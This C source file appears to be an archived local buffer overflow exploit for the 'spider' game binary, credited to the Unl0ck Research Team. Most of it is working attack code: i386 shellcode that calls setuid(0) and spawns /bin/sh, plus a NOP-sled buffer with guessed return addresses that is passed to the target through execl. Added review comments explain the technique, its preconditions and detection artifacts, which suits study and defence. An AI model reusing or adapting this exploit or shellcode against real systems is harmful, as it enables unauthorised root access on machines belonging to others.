Spider game local buffer overflow exploit.
e3cc4d7d111162ecb945ae14b0176162973648ebee57c23965c8b7c11d36145f
/*
Spider Game Local Buffer Overflow Exploit
by Dark Eagle
Unl0ck Research Team
http://unl0ck.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Path of the target program; main() passes it to execl() as argv[0]. */
#define BIN "/usr/bin/spider"
/*
 * 32-byte i386 Linux payload that main() places at the end of the
 * argument buffer.  Decoded from the bytes below:
 *   - int 0x80 with eax = 0x17, ebx = 0   -> setuid(0)
 *   - int 0x80 with eax = 0x0b on the stacked string "/bin//sh" -> execve
 * It contains no zero byte, so it survives the "%s" copy in main() and
 * being passed as a command-line argument.
 *
 * NOTE(review): the setuid(0) call only has an effect if the target runs
 * with elevated effective IDs, so the author presumably expected
 * /usr/bin/spider to be installed set-id; the page does not show this.
 * For detection, the relevant artifacts are the literal "/bin//sh" and a
 * shell spawned as a child of the game binary.
 */
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
/*
 * Intended to hand back the current stack pointer of this process.
 *
 * The body copies %esp into %eax and has no return statement; the value
 * reaches the caller only because %eax is the i386 return register.
 * NOTE(review): using the result of a non-void function that falls off
 * its end is undefined behaviour in C, so this depends on the compiler
 * and optimisation level, and the instruction is 32-bit x86 only.
 */
long getsp()
{
__asm__("movl %esp, %eax");
}
/*
 * Builds a 2000-byte argument (0x90 fill, two copies of a guessed stack
 * address, payload at the end) and exec()s the target with it as the
 * value of "-s".
 *
 * argv[1], if present, is a decimal offset added to this process's own
 * stack pointer to form the guessed address.
 *
 * NOTE(review): the vulnerable code is not on this page; presumably spider
 * copies the -s value into a fixed-size stack buffer without a length
 * check.  As written, the technique depends on an i386 target, a stack
 * address that can be predicted from another process (no ASLR), an
 * executable stack (no NX) and an unguarded saved return address (no
 * stack protector).  The observable artifact is an exec of
 * /usr/bin/spider whose -s value is about 2 KB and mostly 0x90 bytes.
 */
int main(int argc, char *argv[])
{
long RET;
int i, off;
char buf[2000];
char *p;
/* off is assigned only when exactly one argument is given; with any other
   argument count it is read uninitialised on the next line. */
if ( argc == 2 ) { off=atoi(argv[1]); }
/* Guessed address: this process's stack pointer plus the offset. */
RET = getsp()+off;
printf("Local Game Exploit For Spider game\nby Unl0ck Team http://unl0ck.info\np.s. Dark Eagle\n");
p = buf;
/* Fill the first 2000-1-32 = 1967 bytes with 0x90 (x86 NOP). */
memset(buf, 0x90, 2000-1-strlen(shellcode));
/* Copy the payload into the last 32 bytes before the terminator; the "%s"
   copy also writes the NUL at buf[1999]. */
sprintf(buf+2000-1-strlen(shellcode), "%s", shellcode);
/* NOTE(review): RET is a long but is printed with %x (format mismatch). */
printf("using RETADDR = 0x%x and OFFSET = %d\n", RET, off);
/* Two iterations (i = 1035 and 1039): each stores RET through an unaligned
   long pointer, overwriting fill bytes.  Presumably these offsets are where
   the author expected the saved return address in the target; the stores
   are adjacent only if long is 4 bytes. */
for ( i = 1035; i <= 1039; i += 4 )
*(long*)(p+i) = RET;
/* Replace this process with the target: argv[0] = BIN, then "-s" and the
   crafted buffer.  <unistd.h> is not in the include list above, so execl()
   is implicitly declared; its return value is not checked. */
execl("/usr/bin/spider", BIN, "-s", buf, NULL);
}